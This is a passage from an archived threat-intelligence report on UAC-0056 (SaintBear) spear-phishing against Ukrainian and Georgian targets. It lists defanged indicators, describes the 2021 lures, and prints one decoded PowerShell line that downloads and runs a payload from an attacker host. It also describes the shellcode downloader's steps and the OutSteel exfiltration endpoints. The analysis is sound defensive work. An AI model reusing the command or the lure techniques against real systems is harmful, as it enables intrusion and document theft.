3515ea90ffe15cb7e9a7a\r\na9a89bb76c6f06277b729bc2de5e1aaef05fc0d9675edbc0895c7591c35f17eb\r\nafdc010fc134b0b4a8b8788d084c6b0cff9ea255d84032571e038f1a29b56d0a\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 15 of 28\n\nb02c420e6f8a977cd254cd69281a7e8ce8026bda3fc594e1fc550c3b5e41565d\r\nb0b0cb50456a989114468733428ca9ef8096b18bce256634811ddf81f2119274\r\nb0b4550ba09080e02c8a15cec8b5aeaa9fbb193cec1d92c793bdede78a70cec6\r\nb1af67bcfaa99c369960580f86e7c1a42fc473dd85a0a4d3b1c989a6bc138a42\r\nb2f5edef0e599005e205443b20f6ffd9804681b260eec52fa2f7533622f46a6c\r\nb6e34665dd0d045c2c79bf3148f34da0b877514a6b083b7c8c7e2577362463b3\r\nb72188ba545ad865eb34954afbbdf2c9e8ebc465a87c5122cebb711f41005939\r\nb83c41763b5e861e15614d3d6ab8573c7948bf176143ee4142516e9b8bcb4423\r\nb8ce958f56087c6cd55fa2131a1cd3256063e7c73adf36af313054b0f17b7b43\r\nbd83e801b836906bab4854351b4d6000e0a435736524a504b9839b5f7bdf97cc\r\nc222122fe3e1206ba2363c17fb37ae2f8e271840e17b3bb9ba5359f2793f9574\r\nc33a905e513005cee9071ed10933b8e6a11be2335755660e3f7b2adf554f704a\r\nc532d19652ea6d4e0ebb509766de1ec594dd80152f92f7ef6b80ad29d2aa8cf4\r\nc6c47d3d7e56213f0d0ced379c64e166ed5a86308ea96856163a4e0155b1fc6e\r\ncb4a93864a19fc14c1e5221912f8e7f409b5b8d835f1b3acc3712b80e4a909f1\r\ncb6c05b2e9d8e3c384b7eabacde32fc3ac2f9663c63b9908e876712582bf2293\r\ncce564eb25a80549d746c180832d0b3d45dcd4419d9454470bfd7517868d0e10\r\ncd93f6df63187e3ac31ea56339f9b859b0f4fbe3e73e1c07192cef4c9a6f8b08\r\nd4d4aa7d621379645d28f3a16b3ba41b971216869f5448ea5c1fc2e78cfecb26\r\nd6e2a79bc87d48819fabe332dd3539f572605bb6091d34ae7d25ae0934b606b5\r\ndb8975fd6c04a7d3790eb73ab8e95b6dbf6c9d65ad5c6a6d3c862d0284f87c34\r\ndf3b1ad5445d628c24c1308aa6cb476bd9a06f0095a2b285927964339866b2c3\r\ndfc24fa837b6cd3210e7ea0802db3dcf7bb1f85bff2c1b4bda4c3c599821bf8c\r\ne0c46e23bd1b5b96123e0c64914484bbfae7a7ad13cbd45184035d4c0f8a10a2\r\ne8207e8c31a8613112223d126d4f12e7a5f8caf4acaaf40834302ce49f37cc9c\r\ne9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909\r\nebbf30e06de3a25f76cf43c72c521d14a27053e4d9be566b41f50c41bea3a7a9\r\nec3c0afccfef11f753a408c859d98bbba4841e87f7f1a48573270c0d82252b03\r\nec62c984941954f0eb4f3e8baee455410a9dc0deb222360d376e28981c53b1a0\r\nec8868287e3f0f851ff7a2b0e7352055b591a2b2cb1c2a76c53885dee66562dc\r\nf24ee966ef2dd31204b900b5c7eb7e367bc18ff92a13422d800c25dbb1de1e99\r\nf2bdde99f9f6db249f4f0cb1fb8208198ac5bf55976a94f6a1cebfb0d6c30551\r\nf4a56c86e2903d509ede20609182fbe001b3a3ca05f8c23c597189935d4f71b8\r\nf58c41d83c0f1c1e8c1c3bd99ab6deabb14a763b54a3c5f1e821210c0536c3ff\r\nfa1bc7d6f03a49af50f7153814a078a32f24f353c9cb2b8e3f329888f2b37a6e\r\nfad2e8293cf38eec695b1b5c012e187999bd94fbcad91d8f110605a9709c31b3\r\nff07325f5454c46e883fefc7106829f75c27e3aaf312eb3ab50525faba51c23c\r\nffad5217eb782aced4ab2c746b49891b496e1b90331ca24186f8349a5fa71a28\r\nRelated URLs\r\n1000018[.]xyz/soft-2/280421-z1z.exe\r\n1000018[.]xyz/soft/220421.exe\r\n1000020[.]xyz/soft/230421.exe\r\n1221[.]site/15858415841/0407.exe\r\n1221[.]site/1806.exe\r\n15052021[.]space/2405.exe\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 16 of 28\n\n150520212[.]space/0404.exe\r\n185.244.41[.]109:8080/upld/\r\n1924[.]site/soft/09042021.exe\r\n194.147.142[.]232:8080/upld/\r\n194.147.142[.]232:8080/upld/\r\n2215[.]site/240721-1.msi\r\n31.42.185[.]63:8080/upld/\r\n32689657[.]xyz/putty5482.exe\r\n32689658[.]xyz/putty5410.exe\r\n45.146.164[.]37:8080/upld/\r\n45.146.165[.]91:8080/upld/\r\n68468438438[.]xyz/soft/win230321.exe\r\n8003659902[.]space/wp-adm/gate.php\r\nbaiden00[.]ru/def.bat\r\nbaiden00[.]ru/win21st.txt\r\nbaiden00[.]ru/wininst.exe\r\nbit[.]ly/36fee98\r\nbit[.]ly/3qpy7Co\r\ncdn.discordapp[.]com/attachments/853604584806285335/854020189522755604/1406.exe\r\ncdn.discordapp[.]com/attachments/908281957039869965/908282786216017990/AdobeAcrobatUpdate.msi\r\ncdn.discordapp[.]com/attachments/908281957039869965/908310733488525382/AdobeAcrobatUpdate.exe\r\ncdn.discordapp[.]com/attachments/908281957039869965/911202801416282172/AdobeAcrobatReaderUpdate.exe\r\ncdn.discordapp[.]com/attachments/908281957039869965/911383724971683862/21279102.exe\r\ncdn.discordapp[.]com/attachments/932413459872747544/932976938195238952/loader.exe\r\ncdn.discordapp[.]com/attachments/932413459872747544/938291977735266344/putty.exe\r\neumr[.]site/load4849kd30.exe\r\neumr[.]site/load74h74830.exe\r\neumr[.]site/up74987340.exe\r\nmain21[.]xyz/adm2021/gate.php\r\nmohge[.]xyz/install.exe\r\nname1d[.]site/123/index.exe\r\nname1d[.]site/def02.bat\r\nname4050[.]com:8080/upld/9C9C2F98\r\norpod[.]ru/def.exe\r\norpod[.]ru/putty.exe\r\nsmm2021[.]net/load2022.exe\r\nsmm2021[.]net/upload/antidef.bat\r\nsmm2021[.]net/upload/Nvlaq.jpeg\r\nsmm2021[.]net/wp-adm/gate.php\r\nstun[.]site/42348728347829.exe\r\nupdate-0019992[.]ru/testcp1/gate.php\r\nupdate0019992[.]ru/exe/update-22.exe\r\nupdate0019992[.]ru/gate.php\r\nupdate3d[.]xyz/\r\nwebleads[.]pro/public/readerdc_ua_install.exe\r\nwww.baiden00[.]ru/win21st.txt\r\nwww.update0019992[.]ru/exe/update-22.exe\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 17 of 28\n\ncdn.discordapp[.]com/attachments/908281957039869965/908310733488525382/AdobeAcrobatUpdate.exe\r\ncutt[.]ly/1bR6rsQ\r\nmohge[.]xyz/install.exe\r\nmohge[.]xyz/install.txt\r\nstun[.]site/zepok101.exe\r\nsuperiortermpapers[.]org/public/WindowsDefender-UA.exe\r\nDomains\r\n000000027[.]xyz\r\n001000100[.]xyz=\r\n1000018[.]xyz\r\n1000020[.]xyz\r\n1020[.]site\r\n1221[.]site\r\n15052021[.]space\r\n150520212[.]space\r\n1833[.]site\r\n1924[.]site\r\n2055[.]site\r\n2215[.]site\r\n2330[.]site\r\n3237[.]site\r\n32689657[.]xyz\r\n32689658[.]xyz\r\n68468438438[.]xyz\r\n8003659902[.]site\r\n8003659902[.]space\r\n9348243249382479234343284324023432748892349702394023[.]xyz\r\nbaiden00[.]ru\r\nbuking[.]site\r\ncoronavirus5g[.]site\r\neumr[.]site\r\nmain21[.]xyz\r\nmohge[.]xyz\r\nname1d[.]site\r\nname4050[.]com\r\norpod[.]ru\r\nsmm2021[.]net\r\nstun[.]site\r\nupdate-0019992[.]ru\r\nupdate0019992[.]ru\r\nupdate3d[.]xyz\r\nwww.baiden00[.]ru\r\nwww.lywdm[.]com\r\nwww.update0019992[.]ru\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 18 of 28\n\nIPv4 Addresses\r\n185.244.41[.]109\r\n194.147.142[.]232\r\n31.42.185[.]63\r\n45.146.164[.]37\r\n45.146.165[.]91\r\nAdditional Infrastructure\r\n1000018[.]xyz\r\n1000019[.]xyz\r\n1000020[.]xyz\r\n1017[.]site\r\n1120[.]site\r\n1202[.]site\r\n1221[.]site\r\n15052021[.]space\r\n150520212[.]space\r\n150520213[.]space\r\n1681683130[.]website\r\n16868138130[.]space\r\n1833[.]site\r\n1924[.]site\r\n2055[.]site\r\n2215[.]site\r\n2330[.]site\r\n29572459487545-4543543-543534255-454-35432524-5243523-234543[.]xyz\r\n32689657[.]xyz\r\n32689658[.]xyz\r\n32689659[.]xyz\r\n33655990[.]cyou\r\n4895458025-4545445-222435-9635794543-3242314342-234123423728[.]space\r\n9832473219412342343423243242364-34939246823743287468793247237[.]site\r\n99996665550[.]fun\r\nalmamaterbook[.]ru\r\nbuking[.]site\r\ngetvps[.]site\r\ngiraffe-tour[.]ru\r\ngosloto[.]site\r\nname4050[.]com\r\nnoch[.]website\r\notrs[.]website\r\npolk[.]website\r\nsinoptik[.]site\r\nsony-vaio[.]ru\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 19 of 28\n\nAppendix A: Prior Attacks Associated With UAC-0056\r\nPrior attacks associated with UAC-0056 are described below, organized by the time of attack. For an overview of known\r\nattacks, please see the timeline in the “Links to Prior Attacks” section above.\r\nMarch 2021 Attacks\r\nAccording to MalwareBytes research, this threat group carried out an attack campaign in March 2021 on targets in Georgia\r\nusing Bitcoin and COVID themes. The researchers state that these attacks involve spear phishing, but we do not have\r\ntelemetry to confirm the targeted organizations, attack vector or the exact dates in which the attacks took place. The Bitcoin-themed attacks are very similar to those seen in later April attacks, as the PDF delivery documents had similar content that\r\nreferences Electrum bitcoin wallets, as seen in Figure 21.\r\nFigure 21a. Contents of PDF documents used in Bitcoin-themed attacks in March 2021.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 20 of 28\n\nFigure 21b. Contents of PDF documents used in Bitcoin-themed attacks in March 2021.\r\nThe COVID-themed attacks reference a government organization in Georgia, which suggests that the threat group has\r\ninterests in other countries in the region in addition to Ukraine. The attack involved a Zip archive hosted at \r\nbgicovid19[.]com/assets/img/newCOVID-21.zip and contains the two malicious files and one decoy document, as listed in\r\nTable 4.\r\nFilename SHA256 Description\r\n!!! COVID-21.doc\r\n4fcfe7718ea860ab5c6d19b27811f81683576e7bb60da3db85b4658230414b70\r\nDelivery document exploits\r\nCVE-2017-11882 to download\r\nwww.baiden00[.]ru/win21st.txt\r\nNew\r\nFolder.lnk\r\n5d8c5bb9858fb51271d344eac586cff3f440c074254f165c23dd87b985b2110b\r\nLNK Shortcut that downloads\r\nbaiden00[.]ru/wininst.exe\r\nletter from\r\nthe\r\nMinistry of\r\nLabour,\r\nHealth and\r\nSocial\r\nAffairs of\r\nGeorgia.pdf\r\n49a758bfe34f1769a27b1a2da9f914bc956f7fdbb9e7a33534ca9e19d5f6168c Decoy document\r\nTable 4. Delivery documents used in March attack.\r\nThe letter from the Ministry of Labour, Health and Social Affairs of Georgia.pdf document is a decoy, as it contains no\r\nmalicious content. The decoy content does show a document from the Ministry of Labour, Health and Social Affairs of\r\nGeorgia, as seen in Figure 22, which suggests that the target may have involved an organization in Georgia.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 21 of 28\n\nFigure 22. Decoy document’s contents in suspected March 2021 attacks.\r\nApril 2021 Attacks\r\nIn April 2021, the threat group carried out an attack that involved a spear phishing email with a PDF document attached,\r\nwhich suggested the recipient could become rich by accepting Bitcoins, as seen in Figure 23. As first seen in research by\r\nAhnlab, these Bitcoin-themed attacks were specifically targeting Ukrainian government organizations.\r\nFigure 23. Contents of PDF documents used in Bitcoin-themed attacks.\r\nThe PDF document attached to the delivery email contains text that suggests the individual can access a Bitcoin wallet with\r\na large sum of money along with a link to download the wallet, as seen in Figure 24. The link cutt[.]ly/McXG1ft is\r\nshortened and points to the URL http://1924[.]site/doc/bitcoin.zip to download a Zip archive.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 22 of 28\n\nFigure 24. Contents of PDF documents used in Bitcoin-themed attacks.\r\nThe Zip archive contains a LNK shortcut that runs a powershell script to download and execute a payload from\r\nhxxp://1924[.]site/soft/09042021.exe. The archive also contains a password.txt file that has the following contents, which\r\ninvolve an Electrum Bitcoin wallet that links back to the attacks against Ukraine on Feb. 1, 2022:\r\nWallet in folder.\r\nElectrum: https://electrum.org\r\nPassword for walletr is: btc1000000000usd\r\nAccording to Fortinet research, in April 2021, this threat group also carried out COVID-themed attacks on Ukrainian\r\ngovernment organizations. The email seen in Figure 25 includes a fake forwarded message meant to appear as\r\ncorrespondence between a government official and the World Health Organization (WHO). The email contains a link to a\r\nZip archive hosted on the legitimate who.int domain. However, the link points to a shortened link of\r\nhxxps://cutt[.]ly/LcHx2Ga instead.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 23 of 28\n\nFigure 25. Delivery email in COVID-themed attacks.\r\nThe hxxps://cutt[.]ly/LcHx2Ga URL points to hxxp://2330[.]site/NewCovid-21.zip, which hosted a Zip archive (SHA256:\r\n677500881c64f4789025f46f3d0e853c00f2f41216eb2f2aaa1a6c59884b04cc) that contained the following files:\r\nCOVID-21.doc (SHA256: 9803e65afa5b8eef0b6f7ced42ebd15f979889b791b8eadfc98e7f102853451a)\r\nCOVID-21.lnk (SHA256: 2b15ade9de6fb993149f27c802bb5bc95ad3fc1ca5f2e86622a044cf3541a70d)\r\nGEO-CFUND-2009_CCM Agreement_Facesheet - signed.pdf (SHA256:\r\nbbab12dc486b1c6fcf9e343ec1474d0f8967de988444d7f838f1b4dcab343e8a)\r\nNew Folder.lnk (SHA256: 2b15ade9de6fb993149f27c802bb5bc95ad3fc1ca5f2e86622a044cf3541a70d)\r\nThe LNK shortcuts attempt to run a PowerShell script that will download an executable from the following URL, save it to\r\n%TEMP%\\WindowsUpdate.exe and execute it:\r\nhxxp://2330[.]site/soft/08042021.exe\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 24 of 28\n\nThe LNK shortcut downloads the executable from the URL above using the Start-BitsTransfer cmdlet, which is the same\r\ntechnique the threat group used to download the payload within the macro in the July 2021 attacks discussed below.\r\nMay 2021 Attacks\r\nIn May 2021, we saw the threat group sending targeted emails sent to two Ukrainian government organizations. The two\r\nemails had subjects of Заява №4872823 and Заява №487223/2, and both had the same message content that suggested the\r\nemail was from a senior investigator trying to contact the individual, as seen in Figure 26. The use of law enforcement\r\nrelated themes across May and June 2021, as well as in February 2022, suggests that the threat group favors this social\r\nengineering theme in the absence of a trending topic or current event.\r\nFigure 26. Spear phishing email sent to Ukrainian government organizations in May 2021.\r\nBoth of the delivery emails had the same attachment, specifically Заява №4872823-(20).cpl (SHA256:\r\nf4a56c86e2903d509ede20609182fbe001b3a3ca05f8c23c597189935d4f71b8), which is a Windows Control Panel File that\r\nacts as an initial downloader to download and execute a payload from:\r\n32689657[.]xyz/putty5482.exe\r\nThe Control Panel File saves the downloaded executable to %PUBLIC%\\puttys.exe and runs it using the WinExec function.\r\nThe resulting executable (SHA256: df3b1ad5445d628c24c1308aa6cb476bd9a06f0095a2b285927964339866b2c3)\r\neventually runs the OutSteel document stealer, which will exfiltrate files to the following URL:\r\nhxxp://194[.]147.142.232/upld/\r\nJune 2021 Attacks\r\nIn June 2021, we observed this threat group targeting another Ukrainian government organization by sending a spear\r\nphishing email with a subject that translates to “Your arrest warrant” from Ukrainian. The content of this email, seen in\r\nFigure 27, includes urgent language suggesting that the recipient must read the attached report or they will be declared\r\n“wanted.” This law enforcement theme relates to the Feb. 1, 2022, attacks that used a supposed police report as part of social\r\nengineering.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 25 of 28\n\nFigure 27. Spear phishing email sent to Ukrainian government organization in June 2021.\r\nThe attachment is not a report as the body of the email suggests. Rather, the Заява №487223-31.doc (880m5) .js file\r\nattached is a JavaScript file that is 1,029,786 bytes in size (the actors added a considerable amount of spaces between each\r\ncharacter of the JavaScript code). If the recipient opens the attachment, the following JavaScript will execute:\r\nFigure 28. Malicious JavaScript contained in attached file.\r\nThe JavaScript above will run an encoded PowerShell script that decodes to the following:\r\ninvOKe-WeBREqUEST -urI hxxp://150520212[.]space/000.cpl -oUtFILE $ENv:PuBLiC\\000.cpl; \u0026 $eNV:PUBlIc\\000.cpl\r\nThis PowerShell script will download and execute a Control Panel File (CPL) from 150520212[.]space, which it saves to a\r\nfile named 000.cpl (SHA256: b72188ba545ad865eb34954afbbdf2c9e8ebc465a87c5122cebb711f41005939). The 000.cpl is\r\na DLL whose functional code exists within the exported function CPlApplet. The functional code uses several consecutive\r\njumps in an attempt to make code analysis more difficult. Despite these jumps, the functional code starts with a decryption\r\nstub, which will XOR each QWORD in the ciphertext using a key that starts as 0x29050D91. However, in each iteration of\r\nthe decryption loop, the key is modified by multiplying it by 0x749507B5 and adding 0x29050D91.\r\nOnce the decryption stub has finished, the code jumps to the decrypted code, which is a shellcode-based downloader that\r\ncarries out the following activity:\r\n1. Loads kernel32 using LoadLibraryW\r\n2. Gets the address to ExpandEnvironmentStringsW using GetProcAddress\r\n3. Calls ExpandEnvironmentStringsA to expand the environment string for the path %PUBLIC%\\5653YQ5T3.exe\r\n4. Opens the %PUBLIC%\\5653YQ5T3.exe file using CreateFileW\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 26 of 28\n\n5. Loads WinHttp using LoadLibraryA\r\n6. Opens an HTTP session by calling WinHttpOpen\r\n7. Connects to remote server 150520212[.]space over port 80/TCP by calling WinHttpConnect\r\n8. Creates an HTTP GET request for /0404.exe using WinHttpOpenRequest\r\n9. Sends the request via WinHttpSendRequest\r\n10. Calls WinHttpReceiveResponse, WinHttpQueryDataAvailable and WinHttpReadData to get the HTTP response data\r\n11. Writes the response data to %PUBLIC%\\5653YQ5T3.exe by calling WriteFile\r\n12. Closes handle to %PUBLIC%\\5653YQ5T3.exe by calling CloseHandle\r\n13. Runs %PUBLIC%\\5653YQ5T3.exe by calling ShellExecuteW\r\n14. Finishes by calling ExitProcess\r\nThe file hosted at 150520212[.]space/0404.exe (SHA256:\r\ncb4a93864a19fc14c1e5221912f8e7f409b5b8d835f1b3acc3712b80e4a909f1) is an OutSteel sample that gathers and\r\nexfiltrates files to http://45[.]146.164.37/upld/.\r\nJuly 2021 Targeting\r\nOn July 22, 2021, we observed a spear phishing attempt in which the threat group targeted a Western government entity in\r\nUkraine. The actors sent the email to an address publicly displayed on the embassy’s website with the subject RE: CV. The\r\nemail had a Word document attached to it with a filename structured as \u003cfirst name\u003e_\u003clast name\u003e_CV.doc, of which the\r\nname was a well-known journalist in Ukraine. Figure 29 shows the contents of the attached document as it would display in\r\na native Ukrainian installation of Windows.\r\nFigure 29. Contents of delivery document used in July 2021 attacks on an embassy in Kyiv.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 27 of 28\n\nThe content of the document is meant to resemble a resume of the journalist. However, the garbled text suggests an encoding\r\nissue that the Ukrainian version of Windows could not display. The image is a stock photo available at several websites [1]\r\n[2][3], which does not appear to be a picture of the actual journalist. The garbled text is likely intentional as an attempt to\r\ntrick the user into clicking the “Enable Editing” button, which would ultimately run the macro embedded in the document.\r\nThe macro that will run if the user clicks the “Enable Editing” button, seen in Figure 30, creates a batch script called\r\nmeancell.bat that executes a PowerShell command that will use the Start-BitsTransfer cmdlet to download a payload from\r\nhxxp://1833[.]site/kpd1974.exe. It then saves it to and executes everylisten.exe. Figure 30 shows the contents of the macro\r\nfound in this delivery document.\r\nFigure 30. Contents of macro in delivery document.\r\nThe kpd1974.exe file (SHA256: b8ce958f56087c6cd55fa2131a1cd3256063e7c73adf36af313054b0f17b7b43) downloaded\r\nand executed by the macro ultimately runs a variant of the OutSteel document harvesting tool that exfiltrates files to\r\nhxxp://45.146.165[.]91:8080/upld/. We found two additional delivery documents that shared a similar macro and hosted the\r\npayload on the 1833[.]site, as seen in Table 5. One of the filenames of these two related documents suggest that the threat\r\ngroup continued to use the fake resume theme.\r\nFirst Seen Filename Download URL\r\n7/23/2021 Довiдка (22-7-2021).doc hxxp://1833[.]site/gp00973.exe\r\n7/23/2021 CV_RUSLANA.doc hxxp://1833[.]site/rsm1975.exe\r\nTable 5. Related delivery documents used in July attack.\r\nSource: https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 28 of 28",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/"
	],
	"report_names": [
		"ukraine-targeted-outsteel-saintbot"
	],
	"threat_actors": [
		{
			"id": "eecf54a2-2deb-41e5-9857-fed94a53f858",
			"created_at": "2023-01-06T13:46:39.349959Z",
			"updated_at": "2026-04-10T02:00:03.296196Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Bleeding Bear",
				"Cadet Blizzard",
				"Nascent Ursa",
				"Nodaria",
				"Storm-0587",
				"DEV-0587",
				"Saint Bear",
				"EMBER BEAR",
				"UNC2589",
				"TA471",
				"UAC-0056",
				"FROZENVISTA",
				"Lorec53",
				"Lorec Bear"
			],
			"source_name": "MISPGALAXY:SaintBear",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c28760b2-5ec6-42ad-852f-be00372a7ce4",
			"created_at": "2022-10-27T08:27:13.172734Z",
			"updated_at": "2026-04-10T02:00:05.279557Z",
			"deleted_at": null,
			"main_name": "Ember Bear",
			"aliases": [
				"Ember Bear",
				"UNC2589",
				"Bleeding Bear",
				"DEV-0586",
				"Cadet Blizzard",
				"Frozenvista",
				"UAC-0056"
			],
			"source_name": "MITRE:Ember Bear",
			"tools": [
				"P.A.S. Webshell",
				"CrackMapExec",
				"ngrok",
				"reGeorg",
				"WhisperGate",
				"Saint Bot",
				"PsExec",
				"Rclone",
				"Impacket"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "03a6f362-cbab-4ce9-925d-306b8c937bf1",
			"created_at": "2024-11-01T02:00:52.635907Z",
			"updated_at": "2026-04-10T02:00:05.339384Z",
			"deleted_at": null,
			"main_name": "Saint Bear",
			"aliases": [
				"Saint Bear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"Lorec53"
			],
			"source_name": "MITRE:Saint Bear",
			"tools": [
				"OutSteel",
				"Saint Bot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "083d63b2-3eee-42a8-b1bd-54e657a229e8",
			"created_at": "2022-10-25T16:07:24.143338Z",
			"updated_at": "2026-04-10T02:00:04.879634Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Ember Bear",
				"FROZENVISTA",
				"G1003",
				"Lorec53",
				"Nascent Ursa",
				"Nodaria",
				"SaintBear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"UNC2589"
			],
			"source_name": "ETDA:SaintBear",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Elephant Client",
				"Elephant Implant",
				"GraphSteel",
				"Graphiron",
				"GrimPlant",
				"OutSteel",
				"Saint Bot",
				"SaintBot",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434395,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2dcf8a821046d08371dfd07bf2812c8c681d6b68.pdf",
		"text": "https://archive.orkl.eu/2dcf8a821046d08371dfd07bf2812c8c681d6b68.txt",
		"img": "https://archive.orkl.eu/2dcf8a821046d08371dfd07bf2812c8c681d6b68.jpg"
	}
}